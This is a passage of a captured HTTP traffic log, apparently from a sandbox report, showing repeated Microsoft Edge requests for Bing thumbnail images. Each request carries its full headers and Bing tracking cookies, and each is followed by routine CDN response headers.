cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2563
x-check-cacheable: YES
cache-control: public, max-age=3058798
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049e5
GET

https://th.bing.com/th?id=OIP.6Wa7yuw0IeCUux3NuTq2ZwHaGP&w=80&h=80&c=1&vt=10&bgcl=26b666&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.6Wa7yuw0IeCUux3NuTq2ZwHaGP&w=80&h=80&c=1&vt=10&bgcl=26b666&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1252
x-check-cacheable: YES
cache-control: public, max-age=883712
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049f8
GET

https://th.bing.com/th?id=ODLS.26b53f28-9fe7-4793-b7fc-d9001d03db47&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.26b53f28-9fe7-4793-b7fc-d9001d03db47&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1981
cache-control: public, max-age=1209585
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049e8
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.f05dd542-42b2-46ba-8178-5e3747f79484&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.f05dd542-42b2-46ba-8178-5e3747f79484&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1543
cache-control: public, max-age=1209587
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049ea
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.WgAFMiMCeLa8dlpNutT7dwHaFb&w=80&h=80&c=1&vt=10&bgcl=96a1b3&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.WgAFMiMCeLa8dlpNutT7dwHaFb&w=80&h=80&c=1&vt=10&bgcl=96a1b3&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1242
cache-control: public, max-age=1209600
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049de
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.TMLNWuIbCrM63QqE5sltREteU3gCth5yFMSvLyjRGdTK7Es&w=150&h=220&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.TMLNWuIbCrM63QqE5sltREteU3gCth5yFMSvLyjRGdTK7Es&w=150&h=220&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1475
cache-control: public, max-age=1209545
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049f9
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.f26bf61d4e3becf4df6936414f0865ab&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.f26bf61d4e3becf4df6936414f0865ab&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
